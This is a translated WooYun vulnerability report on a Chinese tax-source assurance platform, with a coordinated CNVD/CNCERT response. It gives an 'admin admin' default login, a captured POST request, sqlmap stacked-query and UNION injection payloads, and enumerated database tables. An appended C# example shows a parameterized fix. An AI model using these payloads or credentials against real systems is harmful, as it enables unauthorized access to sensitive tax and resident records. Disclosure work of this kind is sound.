
Vulnerability summary

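Vulnerability ID: wooyun-2016-0168721

Title: Weak password / SQL injection in a tax-source assurance work platform

Vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2016-01-14 17:02

Fixed: 2016-02-27 11:49

Disclosed: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]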


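Vulnerability details

Disclosure status:

2016-01-14: Details reported to the vendor; awaiting vendor handling
2016-01-18: Vendor confirmed; details disclosed to the vendor only
2016-01-28: Details disclosed to core white hats and experts in related fields
2016-02-07: Details disclosed to regular white hats
2016-02-17: Details disclosed to trainee white hats
2016-02-27: Details disclosed to the public

Brief description:

Weak password / SQL injection in a tax-source assurance work platform

Detailed description: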

**.**.**.**/
admin admin


[Screenshot: QQ截图20160109192322.png]

[Screenshot: QQ截图20160109192454.png]


POST /ScManufact/ScPlan.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**/ScManufact/ScPlan.aspx
Cookie: ASP.NET_SessionId=ctvqjf5hwbhubi3btg0m2t34; mytable_notify_2=170513f4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4609

__VIEWSTATE=[omitted]&__EVENTVALIDATION=%2FwEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI%2FJ7Q0mwQDqQi7&TextBox1=123*&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1

Parameter: #1* ((custom) POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=/wEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu/93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI/J7Q0mwQDqQi7&TextBox1=123';WAITFOR DELAY '0:0:5'--&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: __VIEWSTATE=[omitted]&__EVENTVALIDATION=/wEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu/93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI/J7Q0mwQDqQi7&TextBox1=123' UNION ALL SELECT 75,75,75,75,75,75,75,75,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(79)+CHAR(105)+CHAR(75)+CHAR(103)+CHAR(66)+CHAR(73)+CHAR(80)+CHAR(66)+CHAR(110)+CHAR(109)+CHAR(99)+CHAR(69)+CHAR(74)+CHAR(89)+CHAR(81)+CHAR(107)+CHAR(111)+CHAR(97)+CHAR(72)+CHAR(107)+CHAR(87)+CHAR(120)+CHAR(84)+CHAR(115)+CHAR(90)+CHAR(112)+CHAR(99)+CHAR(67)+CHAR(111)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(118)+CHAR(85)+CHAR(87)+CHAR(117)+CHAR(67)+CHAR(113)+CHAR(77)+CHAR(100)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),75,75,75-- -&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: master
[15 tables]
+-------------------------------------+
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| pbcatcol                            |
| pbcatedt                            |
| pbcatfmt                            |
| pbcattbl                            |
| pbcatvld                            |
| spt_fallback_db                     |
| spt_fallback_dev                    |
| spt_fallback_usg                    |
| spt_monitor                         |
| spt_values                          |
| sys.dm_os_hosts                     |
| sys.dm_os_loaded_modules            |
| sys.dm_os_memory_allocations        |
| sys.openkeys                        |
+-------------------------------------+
Database: hexieshequ_develop_old
[15 tables]
+-------------------------------------+
| ERPNForm                            |
| ERPNFormType                        |
| ERPNWorkDetails                     |
| ERPNWorkFlow                        |
| ERPNWorkFlowNode                    |
| ERPNWorkFlowWT                      |
| ERPNWorkToDo                        |
| staff                               |
| system_log                          |
| t_Union_members                     |
| t_duty                              |
| t_jiu_renkou_ddj                    |
| t_jiu_renkou_xinxi_bak2             |
| t_jiu_renkou_xinxi_xilou            |
| t_old_soldier                       |
+-------------------------------------+
Database: msdb
[9 tables]
+-------------------------------------+
| backupfile                          |
| backupmediafamily                   |
| backupmediaset                      |
| backupset                           |
| logmarkhistory                      |
| restorefile                         |
| restorefilegroup                    |
| restorehistory                      |
| suspect_pages                       |
+-------------------------------------+
Database: hexieshequ
[15 tables]
+-------------------------------------+
| T_Rental_record                     |
| aaa                                 |
| staff                               |
| system_log                          |
| t_Union_members                     |
| t_duty                              |
| t_jiu_renkou_ddj                    |
| t_jiu_renkou_xinxi_bak2             |
| t_jiu_renkou_xinxi_xilou            |
| t_local_tax_record_import           |
| t_old_soldier                       |
| t_tax_info_dtl                      |
| v_company_tax_rank                  |
| v_monthly_company_tax_dtl_bak       |
| v_no_reg_company                    |
+-------------------------------------+

Proof of vulnerability:

Same login, request and sqlmap output as in the detailed description above.

Fix:

You are more expert at this than I am.

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)
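
The sqlmap findings above place the injection in the TextBox1 field posted to ScPlan.aspx. As an added illustration (not the platform's code, which the report does not show), here is the concatenated query shape that produces such findings next to a parameterized replacement; the table ScPlan, its columns and the connection string name AppDb are hypothetical.

```csharp
// Added illustration; table ScPlan, its columns and the connection string
// name "AppDb" are hypothetical. TextBox1 is the field named in the report.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
public static class PlanSearch
{
    // Vulnerable shape: the TextBox1 value becomes part of the SQL text, so a
    // quote ends the literal and the rest of the input is parsed as SQL.
    public static DataTable SearchUnsafe(string keyword)
    {
        string sql = "SELECT * FROM ScPlan WHERE PlanName LIKE '%" + keyword + "%'";
        return Run(new SqlCommand(sql));
    }

    // Hardened shape: constant SQL text, value bound as a typed parameter, so
    // quotes, semicolons and comment markers stay data.
    public static DataTable SearchSafe(string keyword)
    {
        if (keyword == null || keyword.Length > 50)
            throw new ArgumentException("search term missing or too long", "keyword");
        var cmd = new SqlCommand(
            "SELECT PlanId, PlanName, CreatedAt FROM ScPlan " +
            "WHERE PlanName LIKE @kw ESCAPE '\\'");
        // Size 128 covers 50 characters after escaping plus the two wildcards.
        cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 128).Value =
            "%" + EscapeLike(keyword) + "%";
        return Run(cmd);
    }
    // LIKE metacharacters typed by the user are matched literally.
    static string EscapeLike(string s)
    {
        return s.Replace("\\", "\\\\").Replace("%", "\\%").Replace("_", "\\_").Replace("[", "\\[");
    }
    static DataTable Run(SqlCommand cmd)
    {
        string cs = ConfigurationManager.ConnectionStrings["AppDb"].ConnectionString;
        using (var conn = new SqlConnection(cs))
        using (cmd)
        using (var adapter = new SqlDataAdapter(cmd))
        {
            cmd.Connection = conn;
            var table = new DataTable();
            adapter.Fill(table);   // Fill opens and closes the connection itself
            return table;
        }
    }
}
```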


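Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-01-18 18:50

Vendor reply:

CNVD confirms the situation described; it has been forwarded via CNCERT to the Zhejiang branch center, which will follow up and coordinate with the organization managing the website to handle it.

Latest status:

None yet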